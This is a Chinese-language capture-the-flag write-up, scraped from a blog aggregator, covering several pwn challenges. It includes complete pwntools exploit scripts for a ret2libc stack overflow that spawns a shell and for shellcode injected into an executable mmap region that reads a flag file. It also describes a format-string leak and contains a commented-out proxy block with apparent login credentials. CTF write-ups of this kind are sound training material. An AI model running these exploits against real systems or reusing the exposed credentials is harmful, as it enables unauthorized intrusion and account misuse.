当前位置: 首页 > news >正文

网络安全竞赛pwn全解及第一道ai的wp

先用ida看看

普通的菜单题,第一个这个比较的是字符的1234,所以输字符,输入2有栈溢出,打ret2libc即可。exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
li='./libc.so.6'
'''
socks.set_default_proxy(
socks.SOCKS5,
"81.dart.ccsssc.com",
25790,
username="1nkvap1o",
password="cl330rd",
rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
p = remote('xt.xl-lab.top',33662)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
rdi=0x40129a
back=0x40136F
ret=0x401410
pu=elf.sym['puts']
puts=elf.got['puts']
sdr(2)
pay=0x58*b'b'+flat(rdi,puts,pu,back)
sd(pay)
ru(b"\x1B[32m"+"发送完毕。".encode()+b"\x1B[0m\n")
libcbase=u6(6)-libc.sym['puts']
sy=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pay=0x58*b'b'+flat(ret,rdi,binsh,sy)
sd(pay)
ph(libcbase)
ti()
异步逃逸

这里ida没识别出来这个mmap64,看汇编

相当于这个mmap64(0,0x2000,7,0x22,0xffffffff,0)。简单来说就是分配了一段可读可写可执行的大小为0x2000的内存(第三个参数权限是7)后面就简单了,往v4写shellcode然后跳转过去执行,shellcode没任何限制。沙箱允许ORW,直接shellcraft生成就行了。exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
'''
socks.set_default_proxy(
socks.SOCKS5,
"81.dart.ccsssc.com",
25790,
username="1nkvap1o",
password="cl330rd",
rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
p = remote('xt.xl-lab.top',33583)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
pay=asm(shellcraft.open(b'./flag',0))+asm(shellcraft.read(3,0x4AD2BC,0x100))+asm(shellcraft.write(1,0x4AD2BC,0x100))
sd(pay)
ti()
蜜雪冰城

前面的没啥意思不看了,直接看漏洞点

这里首先把flag写到栈上了,然后有格式化字符串漏洞,看后面可以知道是在会员的积分那里有格式化字符串漏洞。直接%p读出来flag的信息,再用cyberchef的大端转化成小端和hex转字符串就可以读出来flag了。就演示第一段吧,虽然是web,但漏洞还是一样的。

从%8$p一直读到13就可以了

http://www.gsyq.cn/news/1601317.html

相关文章:

  • LabVIEW性能调优实战:从瓶颈定位到速度飞跃
  • STM32实战:HC-SR04超声波测距模块的精准驱动与误差优化
  • N_m3u8DL-RE流媒体下载器:让在线视频轻松变成本地收藏
  • 从一维双原子链到声子谱:晶格振动的声学支与光学支全解析
  • 超越传统超频:SMUDebugTool如何解锁AMD Ryzen处理器隐藏性能
  • 仅限首批技术顾问获取:OpenAI未公开的模型行为差异手册(含system prompt敏感度、长文本截断策略、温度值响应曲线)
  • 从一段模板说起
  • SQLite 在独立开发中的实战与优化:用轻量架构应对高并发
  • 硬件原理图设计审查实战指南:从Checklist到高效协作
  • Linux内核页缓存覆写提权双链攻击深度剖析:CVE-2026-46331与CVE-2026-43503联动利用、检测与加固实战
  • 深入解析ChatGPT API的Token机制:从原理到精准计费实践
  • 《淘宝订单API为什么个人账号调不通?企业认证+场景核验避坑指南》(附python源码)
  • 【PyTorch】从ModuleNotFoundError到模型洞察:torchinfo安装、实战与避坑指南
  • 从手动到脚本:探索文件资源管理器(explorer)的优雅重启与状态恢复
  • 如何通过OneMore插件高效管理OneNote笔记:从基础编辑到智能组织实践指南
  • 从零到一:在VS2022中集成QT的实战环境配置
  • OpenCore Legacy Patcher深度解析:老款Mac焕新终极指南
  • 广州图创interlib3系统sendMessage接口SQL注入漏洞深度剖析与修复
  • 基于STM32与Android的物联网环境监测APP开发实战
  • TFLite模型高效集成:从Gradle自动化到本地化部署实战
  • WandEnhancer深度解析:三步骤解锁WeMod完整功能的技术实现方案
  • 企业智能体与业务系统集成时权限管理怎么做
  • 终极指南:使用SMUDebugTool优化AMD Ryzen处理器性能
  • 从SketchUp到3D打印机:STL插件完整指南,让创意触手可及
  • 从 PHP 到 AI + Golang,程序员自救转型手记(十二):前端状态商店、多语言初始化
  • 3个关键问题:SMUDebugTool如何彻底改变AMD Ryzen处理器的硬件调试体验?
  • Fortran开发实战:在VS2019与oneAPI环境中高效集成MKL库
  • AI Agent Runtime 重构:Session 作为事件日志的工程实践
  • 如何在macOS上安装微信防撤回插件:3分钟快速指南
  • Stateless 应用里的锁,SAP Fiori Draft 为什么把锁从 ABAP Session 里搬了出来